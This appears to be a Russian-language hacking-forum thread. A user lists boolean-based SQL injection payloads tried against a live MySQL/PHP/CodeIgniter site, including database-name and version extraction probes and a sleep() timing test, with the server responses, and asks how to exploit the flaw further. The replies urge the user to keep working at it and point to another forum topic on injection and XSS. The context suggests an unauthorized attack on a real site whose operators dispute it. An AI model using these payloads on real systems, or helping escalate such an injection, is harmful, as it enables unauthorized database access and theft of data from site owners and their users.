Всем привет.
Нашел вроде Sql Inection BOOLEN BASED, но пишут что у них везде проверки и в их базу нечего внедрено не было.
Запросы:
add' -- - Работает
add' AND 2*3*8=6*8 AND '000mW7b'!='000mW7b% - Информация есть
add' AND 1*3*8=6*8 AND '000mW7b'!='000mW7b% - Нет

add' AND '1'='1 - Инормация есть
add' AND '1'='2 - Нет

При попытки добавить запросы выбивает ошибку 500:

add' AND (ascii(substr((select database()),1,1))) > 100 AND '000mW7b'!='000mW7b% - Ошибка 500
add' AND (ascii(substring(version(),2,1)))=56-- - - Ошибка 500
aa' and sleep(4) and '1'='1 - Ошибка 500

Wappalyzer показывает:
Mysql, php, CodeIgniter

Есть возможность раскрутить? Может мне надо обратить на что то внимания?

Ну так надо крутить, чтоб понять, есть ли возможность ) Ясновидящих тут нет.
Вооружайся мануалами, шпаргалками, статьями из инета, документацией по mysql и крути.

wallhack сказал(а):

Всем привет.
Нашел вроде Sql Inection BOOLEN BASED, но пишут что у них везде проверки и в их базу нечего внедрено не было.
Запросы:
add' -- - Работает
add' AND 2*3*8=6*8 AND '000mW7b'!='000mW7b% - Информация есть
add' AND 1*3*8=6*8 AND '000mW7b'!='000mW7b% - Нет

add' AND '1'='1 - Инормация есть
add' AND '1'='2 - Нет

При попытки добавить запросы выбивает ошибку 500:

add' AND (ascii(substr((select database()),1,1))) > 100 AND '000mW7b'!='000mW7b% - Ошибка 500
add' AND (ascii(substring(version(),2,1)))=56-- - - Ошибка 500
aa' and sleep(4) and '1'='1 - Ошибка 500

Wappalyzer показывает:
Mysql, php, CodeIgniter

Есть возможность раскрутить? Может мне надо обратить на что то внимания?


На соседнем форуме есть топик "Найденные интересеные SQL inj & XSS". Там могут помочь